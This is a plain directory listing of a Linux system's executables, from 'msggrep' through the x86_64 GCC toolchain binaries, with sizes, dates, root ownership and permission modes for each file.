March 25 2022 6:31:07
root
0755
msggrep
114.461 KB
March 25 2022 6:31:07
root
0755
msginit
66.391 KB
March 25 2022 6:31:07
root
0755
msgmerge
74.406 KB
March 25 2022 6:31:07
root
0755
msgunfmt
34.391 KB
March 25 2022 6:31:07
root
0755
msguniq
22.375 KB
March 25 2022 6:31:07
root
0755
mt
66.734 KB
April 28 2024 8:30:36
root
0755
mt-gnu
66.734 KB
April 28 2024 8:30:36
root
0755
mtr
72.25 KB
January 11 2022 8:46:46
root
0755
mtr-packet
38.297 KB
January 11 2022 8:46:46
root
0755
mtrace
6.43 KB
September 17 2025 11:26:08
root
0755
mv
134.523 KB
February 08 2024 11:46:39
root
0755
my_print_defaults
171.242 KB
October 24 2025 9:49:40
root
0755
myisam_ftdump
6.35 MB
October 24 2025 9:49:40
root
0755
myisamchk
6.55 MB
October 24 2025 9:49:40
root
0755
myisamlog
6.38 MB
October 24 2025 9:49:40
root
0755
myisampack
6.41 MB
October 24 2025 9:49:40
root
0755
mysql
6.65 MB
October 24 2025 9:49:40
root
0755
mysql_config_editor
157.031 KB
October 24 2025 9:49:40
root
0755
mysql_migrate_keyring
6.53 MB
October 24 2025 9:49:40
root
0755
mysql_secure_installation
6.47 MB
October 24 2025 9:49:40
root
0755
mysql_ssl_rsa_setup
194.898 KB
October 24 2025 9:49:40
root
0755
mysql_tzinfo_to_sql
74.914 KB
October 24 2025 9:49:40
root
0755
mysql_upgrade
6.55 MB
October 24 2025 9:49:40
root
0755
mysqladmin
6.49 MB
October 24 2025 9:49:40
root
0755
mysqlanalyze
6.49 MB
October 24 2025 9:49:40
root
0755
mysqlbinlog
6.8 MB
October 24 2025 9:49:40
root
0755
mysqlcheck
6.49 MB
October 24 2025 9:49:40
root
0755
mysqld_multi
26.726 KB
October 24 2025 9:49:40
root
0755
mysqld_safe
28.454 KB
October 24 2025 9:49:40
root
0755
mysqldump
6.57 MB
October 24 2025 9:49:40
root
0755
mysqldumpslow
7.538 KB
October 24 2025 9:49:40
root
0755
mysqlimport
6.48 MB
October 24 2025 9:49:40
root
0755
mysqloptimize
6.49 MB
October 24 2025 9:49:40
root
0755
mysqlpump
6.85 MB
October 24 2025 9:49:40
root
0755
mysqlrepair
6.49 MB
October 24 2025 9:49:40
root
0755
mysqlreport
38.102 KB
June 10 2025 1:51:05
root
0755
mysqlshow
6.49 MB
October 24 2025 9:49:40
root
0755
mysqlslap
6.5 MB
October 24 2025 9:49:40
root
0755
namei
22.375 KB
April 09 2024 11:32:56
root
0755
nano
276.523 KB
October 10 2024 9:39:30
root
0755
nawk
154.789 KB
January 24 2022 5:57:23
root
0755
nc
38.633 KB
February 23 2022 7:09:43
root
0755
nc.openbsd
38.633 KB
February 23 2022 7:09:43
root
0755
ncal
36.945 KB
January 29 2022 5:12:54
root
0755
neqn
0.892 KB
March 23 2022 9:56:30
root
0755
netcat
38.633 KB
February 23 2022 7:09:43
root
0755
networkctl
102.375 KB
June 04 2025 10:17:43
root
0755
networkd-dispatcher
19.712 KB
May 04 2022 9:29:43
root
0755
newgrp
39.547 KB
February 06 2024 8:54:23
root
4755
ngettext
34.375 KB
March 25 2022 6:31:07
root
0755
nice
34.508 KB
February 08 2024 11:46:39
root
0755
nisdomainname
22.227 KB
March 23 2022 9:57:59
root
0755
nl
98.57 KB
February 08 2024 11:46:39
root
0755
nm
43.625 KB
December 03 2025 11:08:01
root
0755
node
93.13 MB
November 25 2025 7:26:37
root
0755
nodejs
93.13 MB
November 25 2025 7:26:37
root
0755
nohup
34.414 KB
February 08 2024 11:46:39
root
0755
npm
0.053 KB
October 11 2022 6:59:35
root
0755
nproc
34.508 KB
February 08 2024 11:46:39
root
0755
npx
2.853 KB
May 09 2024 6:00:41
root
0755
nroff
3.216 KB
March 23 2022 9:56:30
root
0755
nsenter
26.602 KB
April 09 2024 11:32:56
root
0755
nslookup
118.82 KB
October 21 2025 9:15:59
root
0755
nstat
30.375 KB
March 24 2022 7:56:47
root
0755
nsupdate
74.555 KB
October 21 2025 9:15:59
root
0755
ntfs-3g
159.008 KB
November 01 2022 7:56:19
root
0755
ntfs-3g.probe
14.375 KB
November 01 2022 7:56:19
root
0755
ntfscat
26.375 KB
November 01 2022 7:56:19
root
0755
ntfscluster
38.383 KB
November 01 2022 7:56:19
root
0755
ntfscmp
30.375 KB
November 01 2022 7:56:19
root
0755
ntfsdecrypt
42.383 KB
November 01 2022 7:56:19
root
0755
ntfsfallocate
26.383 KB
November 01 2022 7:56:19
root
0755
ntfsfix
34.383 KB
November 01 2022 7:56:19
root
0755
ntfsinfo
54.383 KB
November 01 2022 7:56:19
root
0755
ntfsls
27.453 KB
November 01 2022 7:56:19
root
0755
ntfsmove
30.383 KB
November 01 2022 7:56:19
root
0755
ntfsrecover
106.375 KB
November 01 2022 7:56:19
root
0755
ntfssecaudit
78.859 KB
November 01 2022 7:56:19
root
0755
ntfstruncate
26.305 KB
November 01 2022 7:56:19
root
0755
ntfsusermap
18.297 KB
November 01 2022 7:56:19
root
0755
ntfswipe
42.906 KB
November 01 2022 7:56:19
root
0755
numfmt
54.539 KB
February 08 2024 11:46:39
root
0755
objcopy
162.539 KB
December 03 2025 11:08:01
root
0755
objdump
365.125 KB
December 03 2025 11:08:01
root
0755
od
66.508 KB
February 08 2024 11:46:39
root
0755
on_ac_power
3.699 KB
June 04 2025 10:47:30
root
0755
open
18.058 KB
December 11 2021 7:14:00
root
0755
openssl
977.805 KB
September 18 2025 8:06:16
root
0755
openvt
22.586 KB
December 16 2022 10:14:33
root
0755
os-prober
4.444 KB
July 11 2021 10:43:50
root
0755
pager
194.383 KB
April 28 2024 4:32:45
root
0755
paperconf
14.148 KB
March 24 2022 8:14:21
root
0755
partx
58.383 KB
April 09 2024 11:32:56
root
0755
passwd
58.57 KB
February 06 2024 8:54:23
root
4755
paste
34.414 KB
February 08 2024 11:46:39
root
0755
patch
186.516 KB
March 25 2022 12:22:21
root
0755
pathchk
34.508 KB
February 08 2024 11:46:39
root
0755
pcre2-config
1.93 KB
January 21 2024 6:42:19
root
0755
pdb3
61.743 KB
November 04 2025 4:48:33
root
0755
pdb3.10
61.743 KB
November 04 2025 4:48:33
root
0755
pdf2dsc
0.682 KB
September 26 2025 12:42:27
root
0755
pdf2ps
0.888 KB
September 26 2025 12:42:27
root
0755
pear
0.774 KB
April 20 2025 3:30:45
root
0755
peardev
0.795 KB
April 20 2025 3:30:45
root
0755
pecl
0.71 KB
April 20 2025 3:30:45
root
0755
peekfd
14.297 KB
March 25 2022 12:29:37
root
0755
perl
3.63 MB
July 26 2025 1:26:40
root
0755
perl5.34-x86_64-linux-gnu
14.305 KB
July 26 2025 1:26:40
root
0755
perl5.34.0
3.63 MB
July 26 2025 1:26:40
root
0755
perlbug
44.124 KB
July 26 2025 1:26:40
root
0755
perldoc
0.122 KB
August 26 2021 2:11:56
root
0755
perlivp
10.612 KB
July 26 2025 1:26:40
root
0755
perlthanks
44.124 KB
July 26 2025 1:26:40
root
0755
perror
1.46 MB
October 24 2025 9:49:40
root
0755
pf2afm
0.486 KB
September 26 2025 12:42:27
root
0755
pfbtopfa
0.504 KB
September 26 2025 12:42:27
root
0755
pgrep
30.242 KB
October 31 2023 7:36:04
root
0755
phar
14.882 KB
November 20 2025 7:56:13
root
0755
phar.phar
14.882 KB
November 20 2025 7:56:13
root
0755
phar.phar7.4
14.536 KB
July 04 2025 12:40:57
root
0755
phar.phar8.2
14.885 KB
July 03 2025 9:07:49
root
0755
phar.phar8.3
14.882 KB
November 20 2025 7:56:13
root
0755
phar7.4
14.536 KB
July 04 2025 12:40:57
root
0755
phar7.4.phar
14.536 KB
July 04 2025 12:40:57
root
0755
phar8.2
14.885 KB
July 03 2025 9:07:49
root
0755
phar8.2.phar
14.885 KB
July 03 2025 9:07:49
root
0755
phar8.3
14.882 KB
November 20 2025 7:56:13
root
0755
phar8.3.phar
14.882 KB
November 20 2025 7:56:13
root
0755
php
5.43 MB
July 03 2025 9:07:49
root
0755
php-config
4.243 KB
November 20 2025 7:56:13
root
0755
php-config7.4
4.302 KB
July 04 2025 12:40:57
root
0755
php-config8.3
4.243 KB
November 20 2025 7:56:13
root
0755
php7.4
4.59 MB
July 04 2025 12:40:57
root
0755
php8.2
5.43 MB
July 03 2025 9:07:49
root
0755
php8.3
5.53 MB
November 20 2025 7:56:13
root
0755
phpabtpl
8.473 KB
November 02 2021 4:45:14
root
0755
phpize
4.828 KB
November 20 2025 7:56:13
root
0755
phpize7.4
4.816 KB
July 04 2025 12:40:57
root
0755
phpize8.3
4.828 KB
November 20 2025 7:56:13
root
0755
pic
200.039 KB
March 23 2022 9:56:30
root
0755
pico
276.523 KB
October 10 2024 9:39:30
root
0755
piconv
8.164 KB
July 26 2025 1:26:40
root
0755
pidof
30.383 KB
December 15 2021 5:17:22
root
0755
pidwait
30.242 KB
October 31 2023 7:36:04
root
0755
pinentry
58.648 KB
March 25 2022 12:31:21
root
0755
pinentry-curses
58.648 KB
March 25 2022 12:31:21
root
0755
ping
74.883 KB
July 24 2025 7:51:44
root
0755
ping4
74.883 KB
July 24 2025 7:51:44
root
0755
ping6
74.883 KB
July 24 2025 7:51:44
root
0755
pinky
34.414 KB
February 08 2024 11:46:39
root
0755
pkaction
18.297 KB
February 26 2022 7:11:57
root
0755
pkcheck
22.297 KB
February 26 2022 7:11:57
root
0755
pkcon
58.305 KB
November 11 2024 11:52:43
root
0755
pkexec
30.148 KB
February 26 2022 7:11:57
root
4755
pkg-config
50.281 KB
March 25 2022 12:22:42
root
0755
pkgtools
1.344 KB
November 02 2021 4:45:14
root
0755
pkill
30.242 KB
October 31 2023 7:36:04
root
0755
pkmon
22.305 KB
November 11 2024 11:52:43
root
0755
pkttyagent
18.297 KB
February 26 2022 7:11:57
root
0755
pl2pm
4.43 KB
July 26 2025 1:26:40
root
0755
pldd
22.367 KB
September 17 2025 11:26:08
root
0755
plymouth
46.297 KB
March 18 2022 6:45:18
root
0755
pm2
0.055 KB
September 08 2024 4:42:41
root
0755
pm2-dev
0.058 KB
September 08 2024 4:42:41
root
0755
pm2-docker
0.065 KB
September 08 2024 4:42:41
root
0755
pm2-runtime
0.065 KB
September 08 2024 4:42:41
root
0755
pmap
34.242 KB
October 31 2023 7:36:04
root
0755
pnpm
1.076 KB
June 28 2025 11:18:13
root
0755
pnpx
0.119 KB
June 28 2025 11:18:13
root
0755
po2debconf
8.47 KB
December 30 2020 9:09:19
root
0755
pod2html
4.04 KB
July 26 2025 1:26:40
root
0755
pod2man
14.682 KB
July 26 2025 1:26:40
root
0755
pod2text
10.55 KB
July 26 2025 1:26:40
root
0755
pod2usage
4.011 KB
July 26 2025 1:26:40
root
0755
podchecker
3.572 KB
July 26 2025 1:26:40
root
0755
podebconf-display-po
12.673 KB
January 10 2015 10:10:54
root
0755
podebconf-report-po
31.762 KB
January 10 2015 11:44:31
root
0755
pphs
0.395 KB
September 26 2025 12:42:27
root
0755
pr
66.578 KB
February 08 2024 11:46:39
root
0755
preconv
54.477 KB
March 23 2022 9:56:30
root
0755
print
18.058 KB
December 11 2021 7:14:00
root
0755
printafm
0.386 KB
September 26 2025 12:42:27
root
0755
printenv
30.383 KB
February 08 2024 11:46:39
root
0755
printf
50.438 KB
February 08 2024 11:46:39
root
0755
prlimit
26.891 KB
April 09 2024 11:32:56
root
0755
pro
0.979 KB
October 27 2025 8:42:11
root
0755
prove
13.338 KB
July 26 2025 1:26:40
root
0755
prtstat
22.375 KB
March 25 2022 12:29:37
root
0755
ps
138.453 KB
October 31 2023 7:36:04
root
0755
ps2ascii
0.616 KB
September 26 2025 12:42:27
root
0755
ps2epsi
1.234 KB
September 26 2025 12:42:27
root
0755
ps2pdf
0.266 KB
September 26 2025 12:42:27
root
0755
ps2pdf12
0.21 KB
September 26 2025 12:42:27
root
0755
ps2pdf13
0.21 KB
September 26 2025 12:42:27
root
0755
ps2pdf14
0.21 KB
September 26 2025 12:42:27
root
0755
ps2pdfwr
1.053 KB
September 26 2025 12:42:27
root
0755
ps2ps
0.632 KB
September 26 2025 12:42:27
root
0755
ps2ps2
0.653 KB
September 26 2025 12:42:27
root
0755
ps2txt
0.616 KB
September 26 2025 12:42:27
root
0755
psfaddtable
26.227 KB
December 16 2022 10:14:33
root
0755
psfgettable
26.227 KB
December 16 2022 10:14:33
root
0755
psfstriptable
26.227 KB
December 16 2022 10:14:33
root
0755
psfxtable
26.227 KB
December 16 2022 10:14:33
root
0755
pslog
14.297 KB
March 25 2022 12:29:37
root
0755
pstree
35.32 KB
March 25 2022 12:29:37
root
0755
pstree.x11
35.32 KB
March 25 2022 12:29:37
root
0755
ptar
3.482 KB
July 26 2025 1:26:40
root
0755
ptardiff
2.583 KB
July 26 2025 1:26:40
root
0755
ptargrep
4.292 KB
July 26 2025 1:26:40
root
0755
ptx
126.555 KB
February 08 2024 11:46:39
root
0755
pwd
34.508 KB
February 08 2024 11:46:39
root
0755
pwdx
14.227 KB
October 31 2023 7:36:04
root
0755
py3clean
7.632 KB
August 08 2024 8:28:21
root
0755
py3compile
12.884 KB
August 08 2024 8:28:21
root
0755
py3versions
11.631 KB
August 08 2024 8:28:21
root
0755
pydoc3
0.077 KB
November 04 2025 4:48:33
root
0755
pydoc3.10
0.077 KB
November 04 2025 4:48:33
root
0755
pygettext3
23.667 KB
June 07 2023 6:30:33
root
0755
pygettext3.10
23.667 KB
June 07 2023 6:30:33
root
0755
python3
5.66 MB
November 04 2025 4:48:33
root
0755
python3.10
5.66 MB
November 04 2025 4:48:33
root
0755
pzstd
702.469 KB
March 25 2022 12:15:58
root
0755
ranlib
54.484 KB
December 03 2025 11:08:01
root
0755
rbash
1.33 MB
March 14 2024 7:31:47
root
0755
rcp
130.586 KB
April 11 2025 8:05:47
root
0755
rdma
98.516 KB
March 24 2022 7:56:47
root
0755
readelf
758.438 KB
December 03 2025 11:08:01
root
0755
readlink
38.414 KB
February 08 2024 11:46:39
root
0755
realpath
38.414 KB
February 08 2024 11:46:39
root
0755
recode-sr-latin
14.375 KB
March 25 2022 6:31:07
root
0755
red
0.087 KB
February 13 2022 7:08:51
root
0755
redis-benchmark
730.664 KB
October 14 2025 12:30:59
root
0755
redis-check-aof
1.41 MB
October 14 2025 12:30:59
root
0755
redis-check-rdb
1.41 MB
October 14 2025 12:30:59
root
0755
redis-cli
354.133 KB
October 14 2025 12:30:59
root
0755
redis-server
1.41 MB
October 14 2025 12:30:59
root
0755
renice
14.375 KB
April 09 2024 11:32:56
root
0755
reset
26.313 KB
May 17 2023 2:45:27
root
0755
resizecons
26.32 KB
December 16 2022 10:14:33
root
0755
resizepart
22.375 KB
April 09 2024 11:32:56
root
0755
resolvectl
130.523 KB
June 04 2025 10:17:43
root
0755
rev
14.375 KB
April 09 2024 11:32:56
root
0755
rgrep
0.029 KB
January 29 2020 8:09:17
root
0755
rlogin
827.039 KB
April 11 2025 8:05:47
root
0755
rm
58.508 KB
February 08 2024 11:46:39
root
0755
rmdir
42.414 KB
February 08 2024 11:46:39
root
0755
rnano
276.523 KB
October 10 2024 9:39:30
root
0755
rotatelogs
26.383 KB
August 11 2025 8:10:10
root
0755
routef
0.203 KB
March 24 2022 7:56:47
root
0755
routel
1.617 KB
March 24 2022 7:56:47
root
0755
rpcgen
94.594 KB
March 25 2022 5:57:34
root
0755
rrsync
12.343 KB
January 16 2025 5:55:20
root
0755
rsh
827.039 KB
April 11 2025 8:05:47
root
0755
rsync
506.125 KB
January 16 2025 5:55:20
root
0755
rsync-ssl
5.016 KB
January 16 2025 5:55:20
root
0755
rtstat
22.656 KB
March 24 2022 7:56:47
root
0755
run-mailcap
18.058 KB
December 11 2021 7:14:00
root
0755
run-parts
26.539 KB
March 23 2022 9:49:54
root
0755
runcon
34.508 KB
February 08 2024 11:46:39
root
0755
rview
3.61 MB
April 02 2025 8:39:01
root
0755
rvim
3.61 MB
April 02 2025 8:39:01
root
0755
savelog
10.241 KB
March 23 2022 9:49:54
root
0755
scp
130.586 KB
April 11 2025 8:05:47
root
0755
screendump
14.148 KB
December 16 2022 10:14:33
root
0755
script
50.375 KB
April 09 2024 11:32:56
root
0755
scriptlive
42.375 KB
April 09 2024 11:32:56
root
0755
scriptreplay
34.375 KB
April 09 2024 11:32:56
root
0755
sdiff
46.391 KB
March 23 2022 9:50:34
root
0755
sed
110.57 KB
March 25 2022 5:51:05
root
0755
see
18.058 KB
December 11 2021 7:14:00
root
0755
select-default-iwrap
0.463 KB
December 03 2021 12:03:03
root
0755
select-editor
2.393 KB
August 30 2021 1:44:44
root
0755
sensible-browser
1.26 KB
August 30 2021 1:44:44
root
0755
sensible-editor
1.239 KB
August 30 2021 1:44:44
root
0755
sensible-pager
0.552 KB
August 30 2021 1:44:44
root
0755
sepdebugcrcfix
18.586 KB
March 23 2022 9:49:59
root
0755
seq
46.508 KB
February 08 2024 11:46:39
root
0755
setarch
26.648 KB
April 09 2024 11:32:56
root
0755
setfont
50.32 KB
December 16 2022 10:14:33
root
0755
setkeycodes
14.227 KB
December 16 2022 10:14:33
root
0755
setleds
18.211 KB
December 16 2022 10:14:33
root
0755
setlogcons
14.227 KB
December 16 2022 10:14:33
root
0755
setmetamode
14.258 KB
December 16 2022 10:14:33
root
0755
setpci
30.383 KB
August 30 2021 10:45:58
root
0755
setpriv
38.383 KB
April 09 2024 11:32:56
root
0755
setsid
14.375 KB
April 09 2024 11:32:56
root
0755
setterm
34.375 KB
April 09 2024 11:32:56
root
0755
setupcon
38.313 KB
November 23 2021 12:39:53
root
0755
sftp
142.664 KB
April 11 2025 8:05:47
root
0755
sg
39.547 KB
February 06 2024 8:54:23
root
4755
sh
122.742 KB
March 23 2022 9:49:23
root
0755
sha1sum
42.414 KB
February 08 2024 11:46:39
root
0755
sha224sum
50.414 KB
February 08 2024 11:46:39
root
0755
sha256sum
50.414 KB
February 08 2024 11:46:39
root
0755
sha384sum
58.414 KB
February 08 2024 11:46:39
root
0755
sha512sum
58.414 KB
February 08 2024 11:46:39
root
0755
shasum
9.745 KB
July 26 2025 1:26:40
root
0755
showconsolefont
18.227 KB
December 16 2022 10:14:33
root
0755
showkey
18.227 KB
December 16 2022 10:14:33
root
0755
shred
50.508 KB
February 08 2024 11:46:39
root
0755
shtool
138.756 KB
December 24 2019 5:26:06
root
0755
shtoolize
15.157 KB
December 24 2019 5:26:06
root
0755
shuf
46.508 KB
February 08 2024 11:46:39
root
0755
size
30.453 KB
December 03 2025 11:08:01
root
0755
skill
30.227 KB
October 31 2023 7:36:04
root
0755
slabtop
22.234 KB
October 31 2023 7:36:04
root
0755
sleep
34.508 KB
February 08 2024 11:46:39
root
0755
slogin
827.039 KB
April 11 2025 8:05:47
root
0755
snice
30.227 KB
October 31 2023 7:36:04
root
0755
soelim
30.477 KB
March 23 2022 9:56:30
root
0755
sort
98.805 KB
February 08 2024 11:46:39
root
0755
sotruss
4.208 KB
September 17 2025 11:26:08
root
0755
splain
18.959 KB
July 26 2025 1:26:40
root
0755
split
50.969 KB
February 08 2024 11:46:39
root
0755
splitfont
14.148 KB
December 16 2022 10:14:33
root
0755
sprof
34.367 KB
September 17 2025 11:26:08
root
0755
ss
125.07 KB
March 24 2022 7:56:47
root
0755
ssh
827.039 KB
April 11 2025 8:05:47
root
0755
ssh-add
166.422 KB
April 11 2025 8:05:47
root
0755
ssh-agent
286.43 KB
April 11 2025 8:05:47
root
2755
ssh-argv0
1.421 KB
July 10 2024 6:17:07
root
0755
ssh-copy-id
12.379 KB
February 23 2022 7:31:11
root
0755
ssh-import-id
0.962 KB
February 11 2021 11:34:06
root
0755
ssh-import-id-gh
0.767 KB
December 08 2020 3:19:36
root
0755
ssh-import-id-lp
0.767 KB
December 08 2020 3:19:36
root
0755
ssh-keygen
446.438 KB
April 11 2025 8:05:47
root
0755
ssh-keyscan
190.438 KB
April 11 2025 8:05:47
root
0755
stat
78.516 KB
February 08 2024 11:46:39
root
0755
static-sh
2.09 MB
August 13 2024 9:39:23
root
0755
stdbuf
42.508 KB
February 08 2024 11:46:39
root
0755
strace
1.88 MB
February 16 2022 5:37:21
root
0755
strace-log-merge
1.778 KB
February 16 2021 4:00:00
root
0755
streamzip
7.755 KB
July 26 2025 1:26:40
root
0755
strings
30.609 KB
December 03 2025 11:08:01
root
0755
strip
162.57 KB
December 03 2025 11:08:01
root
0755
stty
74.508 KB
February 08 2024 11:46:39
root
0755
su
54.375 KB
April 09 2024 11:32:56
root
4755
sudo
226.969 KB
June 25 2025 8:48:23
root
4755
sudoedit
226.969 KB
June 25 2025 8:48:23
root
4755
sudoreplay
87.641 KB
June 25 2025 8:48:23
root
0755
sum
34.414 KB
February 08 2024 11:46:39
root
0755
sync
34.414 KB
February 08 2024 11:46:39
root
0755
systemctl
1.06 MB
June 04 2025 10:17:43
root
0755
systemd
1.76 MB
June 04 2025 10:17:43
root
0755
systemd-analyze
1.73 MB
June 04 2025 10:17:43
root
0755
systemd-ask-password
18.484 KB
June 04 2025 10:17:43
root
0755
systemd-cat
18.375 KB
June 04 2025 10:17:43
root
0755
systemd-cgls
22.477 KB
June 04 2025 10:17:43
root
0755
systemd-cgtop
38.391 KB
June 04 2025 10:17:43
root
0755
systemd-cryptenroll
50.531 KB
June 04 2025 10:17:43
root
0755
systemd-delta
26.367 KB
June 04 2025 10:17:43
root
0755
systemd-detect-virt
18.367 KB
June 04 2025 10:17:43
root
0755
systemd-escape
22.367 KB
June 04 2025 10:17:43
root
0755
systemd-hwdb
118.656 KB
June 04 2025 10:17:43
root
0755
systemd-id128
26.367 KB
June 04 2025 10:17:43
root
0755
systemd-inhibit
22.391 KB
June 04 2025 10:17:43
root
0755
systemd-machine-id-setup
18.484 KB
June 04 2025 10:17:43
root
0755
systemd-mount
50.594 KB
June 04 2025 10:17:43
root
0755
systemd-notify
22.375 KB
June 04 2025 10:17:43
root
0755
systemd-path
18.367 KB
June 04 2025 10:17:43
root
0755
systemd-run
62.57 KB
June 04 2025 10:17:43
root
0755
systemd-socket-activate
26.367 KB
June 04 2025 10:17:43
root
0755
systemd-stdio-bridge
22.375 KB
June 04 2025 10:17:43
root
0755
systemd-sysext
46.492 KB
June 04 2025 10:17:43
root
0755
systemd-sysusers
62.68 KB
June 04 2025 10:17:43
root
0755
systemd-tmpfiles
98.57 KB
June 04 2025 10:17:43
root
0755
systemd-tty-ask-password-agent
34.367 KB
June 04 2025 10:17:43
root
0755
systemd-umount
50.594 KB
June 04 2025 10:17:43
root
0755
tabs
18.305 KB
May 17 2023 2:45:27
root
0755
tac
98.414 KB
February 08 2024 11:46:39
root
0755
tail
66.516 KB
February 08 2024 11:46:39
root
0755
tar
505.813 KB
December 05 2023 1:15:51
root
0755
tasksel
26.817 KB
December 06 2021 9:50:23
root
0755
taskset
22.375 KB
April 09 2024 11:32:56
root
0755
tbl
126.477 KB
March 23 2022 9:56:30
root
0755
tcpdump
1.27 MB
February 08 2024 9:21:43
root
0755
tee
34.508 KB
February 08 2024 11:46:39
root
0755
telnet
107.563 KB
March 25 2022 12:20:51
root
0755
telnet.netkit
107.563 KB
March 25 2022 12:20:51
root
0755
tempfile
14.023 KB
March 23 2022 9:49:54
root
0755
test
42.438 KB
February 08 2024 11:46:39
root
0755
tic
86.414 KB
May 17 2023 2:45:27
root
0755
time
26.523 KB
March 25 2022 5:52:22
root
0755
timedatectl
46.367 KB
June 04 2025 10:17:43
root
0755
timeout
38.945 KB
February 08 2024 11:46:39
root
0755
tload
18.242 KB
October 31 2023 7:36:04
root
0755
tnftp
178.898 KB
March 25 2022 6:01:15
root
0755
toe
22.305 KB
May 17 2023 2:45:27
root
0755
top
130.063 KB
October 31 2023 7:36:04
root
0755
touch
90.508 KB
February 08 2024 11:46:39
root
0755
tput
26.336 KB
May 17 2023 2:45:27
root
0755
tr
46.508 KB
February 08 2024 11:46:39
root
0755
tracepath
18.148 KB
July 24 2025 7:51:44
root
0755
troff
718.609 KB
March 23 2022 9:56:30
root
0755
true
26.305 KB
February 08 2024 11:46:39
root
0755
truncate
34.508 KB
February 08 2024 11:46:39
root
0755
tset
26.313 KB
May 17 2023 2:45:27
root
0755
tsort
46.508 KB
February 08 2024 11:46:39
root
0755
tty
30.508 KB
February 08 2024 11:46:39
root
0755
tzselect
15.019 KB
September 17 2025 11:26:08
root
0755
ua
0.979 KB
October 27 2025 8:42:11
root
0755
ubuntu-advantage
0.979 KB
October 27 2025 8:42:11
root
0755
ubuntu-distro-info
22.891 KB
November 28 2023 8:18:32
root
0755
ubuntu-security-status
22.249 KB
July 11 2024 5:48:43
root
0755
ucf
40.901 KB
June 16 2020 1:37:53
root
0755
ucfq
18.913 KB
June 16 2020 1:37:53
root
0755
ucfr
10.468 KB
June 16 2020 1:37:53
root
0755
uclampset
26.375 KB
April 09 2024 11:32:56
root
0755
udevadm
1.08 MB
June 04 2025 10:17:43
root
0755
ul
22.383 KB
April 09 2024 11:32:56
root
0755
umount
34.375 KB
April 09 2024 11:32:56
root
4755
uname
34.508 KB
February 08 2024 11:46:39
root
0755
unattended-upgrade
97.214 KB
January 15 2022 6:25:41
root
0755
unattended-upgrades
97.214 KB
January 15 2022 6:25:41
root
0755
uncompress
2.291 KB
September 05 2022 9:33:59
root
0755
unexpand
34.531 KB
February 08 2024 11:46:39
root
0755
unicode_start
2.697 KB
December 16 2022 10:14:33
root
0755
unicode_stop
0.518 KB
December 16 2022 10:14:33
root
0755
uniq
42.508 KB
February 08 2024 11:46:39
root
0755
unlink
30.508 KB
February 08 2024 11:46:39
root
0755
unlzma
82.523 KB
April 08 2022 8:51:38
root
0755
unmkinitramfs
3.686 KB
March 19 2024 8:05:17
root
0755
unshare
30.602 KB
April 09 2024 11:32:56
root
0755
unxz
82.523 KB
April 08 2022 8:51:38
root
0755
unzip
170.422 KB
February 01 2024 11:52:55
root
0755
unzipsfx
78.422 KB
February 01 2024 11:52:55
root
0755
unzstd
854.586 KB
March 25 2022 12:15:58
root
0755
update-alternatives
58.242 KB
September 10 2025 4:09:16
root
0755
update-mime-database
58.227 KB
January 14 2022 5:18:27
root
0755
uptime
14.227 KB
October 31 2023 7:36:04
root
0755
usb-devices
4.325 KB
March 25 2022 5:53:09
root
0755
usbhid-dump
30.383 KB
March 25 2022 5:53:09
root
0755
usbreset
14.297 KB
March 25 2022 5:53:09
root
0755
users
34.508 KB
February 08 2024 11:46:39
root
0755
utmpdump
22.375 KB
April 09 2024 11:32:56
root
0755
uuidgen
18.375 KB
April 09 2024 11:32:56
root
0755
uuidparse
22.375 KB
April 09 2024 11:32:56
root
0755
vdir
134.977 KB
February 08 2024 11:46:39
root
0755
vi
3.61 MB
April 02 2025 8:39:01
root
0755
view
3.61 MB
April 02 2025 8:39:01
root
0755
vim
3.61 MB
April 02 2025 8:39:01
root
0755
vim.basic
3.61 MB
April 02 2025 8:39:01
root
0755
vim.tiny
1.45 MB
April 02 2025 8:39:01
root
0755
vimdiff
3.61 MB
April 02 2025 8:39:01
root
0755
vimtutor
2.104 KB
April 02 2025 8:39:01
root
0755
vmstat
38.242 KB
October 31 2023 7:36:04
root
0755
w
22.227 KB
October 31 2023 7:36:04
root
0755
wall
22.375 KB
April 09 2024 11:32:56
root
0755
watch
26.602 KB
October 31 2023 7:36:04
root
0755
watchgnupg
18.305 KB
June 25 2025 9:54:28
root
0755
wc
42.422 KB
February 08 2024 11:46:39
root
0755
wdctl
30.398 KB
April 09 2024 11:32:56
root
0755
wget
459.016 KB
June 19 2024 8:15:59
root
0755
whatis
47.281 KB
March 18 2022 3:03:00
root
0755
whereis
30.836 KB
April 09 2024 11:32:56
root
0755
which
0.924 KB
March 23 2022 9:49:54
root
0755
which.debianutils
0.924 KB
March 23 2022 9:49:54
root
0755
whiptail
30.164 KB
March 18 2022 3:30:58
root
0755
who
50.523 KB
February 08 2024 11:46:39
root
0755
whoami
30.508 KB
February 08 2024 11:46:39
root
0755
write
22.383 KB
April 09 2024 11:32:56
root
0755
write.ul
22.383 KB
April 09 2024 11:32:56
root
0755
x86_64
26.648 KB
April 09 2024 11:32:56
root
0755
x86_64-linux-gnu-addr2line
26.703 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-ar
54.484 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-as
456.398 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-c++filt
22.266 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-cpp
906.82 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-cpp-11
906.82 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-dwp
1.82 MB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-elfedit
34.719 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-g++
906.82 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-g++-11
906.82 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcc
906.82 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcc-11
906.82 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcc-ar
26.539 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcc-ar-11
26.539 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcc-nm
26.539 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcc-nm-11
26.539 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcc-ranlib
26.539 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcc-ranlib-11
26.539 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcov
400.008 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcov-11
400.008 KB
April 22 2025 11:28:20
root
0755
